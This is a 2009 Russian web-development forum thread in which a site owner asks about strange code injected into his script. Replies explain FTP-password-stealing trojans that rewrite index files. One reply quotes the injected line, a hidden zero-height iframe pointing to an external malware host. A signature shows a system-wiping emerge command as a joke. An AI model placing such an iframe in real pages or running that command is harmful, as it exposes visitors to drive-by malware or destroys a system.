|
|
Регистрация Восстановить пароль |
Повторная активизация e-mail |
Регистрация | Задать вопрос |
Заплачу за решение |
Новые сообщения |
Сообщения за день |
Расширенный поиск |
Правила |
Всё прочитано |
|
|
Опции темы | Поиск в этой теме |
28.03.2009, 15:49 | #1 |
Квадрокоптерист
Участник клуба Подтвердите свой е-майл
Регистрация: 29.09.2007
Сообщений: 1,824
|
Взлом?
Здравствуйте.
Сегодня я обнаружил такой странный код: Оригинальный: Код:
Код:
Код:
Код:
Код:
Вопрос номер один: Что это? кто-то пытался стянуть кукисы? Вопрос номер два: Как они залили эту чертовщину в скрипт? Ну если не трудно, кто знает, расскажите об этом коде...
Я часть той силы, что вечно хочет зла, но вечно совершает благо..
|
28.03.2009, 16:15 | #2 |
Форумчанин
Регистрация: 24.03.2009
Сообщений: 215
|
document.writeln("<IFRaME src=\"http://www.kaishi2009.com/set4.htm\" width=100 height=0><\/IFRAME>");
плавающий фрейм с нулевой высотой - наводит сомнения о доброжелательности сайта... Вообще самый популярный вид взлома провайдера - троян, который вытягивает открыто хранящийся пароль из фтп-клиента и правит все индексные файлы, которые обнаруживает. Таким образом конечные пользователи сайта получают свои трояны. Все это противно и нехорошо. Способов взлома огромное количество, и о примененном в данном случае можно только гадать. У нас однажды все индексные файлы на всем сервере исправили на фигню какую-то. Так и не нашли дыру...
wyvern@localhost:~$ sudo emerge --unmerge world
|
28.03.2009, 16:22 | #3 |
Квадрокоптерист
Участник клуба Подтвердите свой е-майл
Регистрация: 29.09.2007
Сообщений: 1,824
|
Честно говоря, мне так кажеться доброжелательностью здесь и не пахнет, смущают фразы про Cookie..
Я часть той силы, что вечно хочет зла, но вечно совершает благо..
|
29.03.2009, 12:30 | #4 |
Laravel/Vue expert
Старожил Подтвердите свой е-майл
Регистрация: 08.08.2007
Сообщений: 2,832
|
Имхо, вы пользуетесь тотал коммандером при доступе на ФТП, а троян украл пароли доступа к ФТП из файла настроек этого тотал коммандера. Часто такое случается..
|
01.04.2009, 00:34 | #5 |
Квадрокоптерист
Участник клуба Подтвердите свой е-майл
Регистрация: 29.09.2007
Сообщений: 1,824
|
имхо конечно, ну думаю что если бы утянули пароли от тотола, было бы все намного серьезнее там ведь пароли к бд.... тем более я уточнял у хостера он дал логи по входу... там только мои ip...
а по безопасности что лучше юзать в место тотола?
Я часть той силы, что вечно хочет зла, но вечно совершает благо..
|
01.04.2009, 01:55 | #6 |
Пользователь
Регистрация: 31.03.2009
Сообщений: 71
|
не сохранять пароли! записать на бумажку и прилипнуть на монитор! :-)
я новичок в php
|
01.04.2009, 09:42 | #7 | |
Laravel/Vue expert
Старожил Подтвердите свой е-майл
Регистрация: 08.08.2007
Сообщений: 2,832
|
Цитата:
|
|
01.04.2009, 22:41 | #8 |
Квадрокоптерист
Участник клуба Подтвердите свой е-майл
Регистрация: 29.09.2007
Сообщений: 1,824
|
не факт если пароль тянет троян он может его и во время подключения утянуть...
SkyM@n, често говоря мне уже все равно как они туда его залили, меня по большей части интересует что они залили....
Я часть той силы, что вечно хочет зла, но вечно совершает благо..
|
02.04.2009, 01:33 | #9 |
Студент, не
Старожил
Регистрация: 29.01.2009
Сообщений: 2,067
|
З.Ы. Интересненько...
Поизучал - говорят сайт, адрес которого во фрейме вируса, "используется для атак на компьютеры"... Если кому интересно - сделал пару скринов...
I am the First of Cyber Evolution...
I am the First to Program your Future... |
02.04.2009, 08:20 | #10 |
Форумчанин
Регистрация: 24.03.2009
Сообщений: 215
|
троян не должен "утягивать пароль". троян скорее всего с твоего же компа и отработал. под твоим же айпишником.
wyvern@localhost:~$ sudo emerge --unmerge world
|
|
Похожие темы | ||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Взлом программы!!! | Александр! | Безопасность, Шифрование | 7 | 27.01.2009 17:46 |
Взлом тестодела!!!!! | СергейСАЛЬСК | Помощь студентам | 14 | 24.01.2009 00:05 |
Взлом установщика | JamS007 | Безопасность, Шифрование | 4 | 22.12.2008 22:06 |
Взлом | Sk!f | Безопасность, Шифрование | 14 | 19.09.2008 16:24 |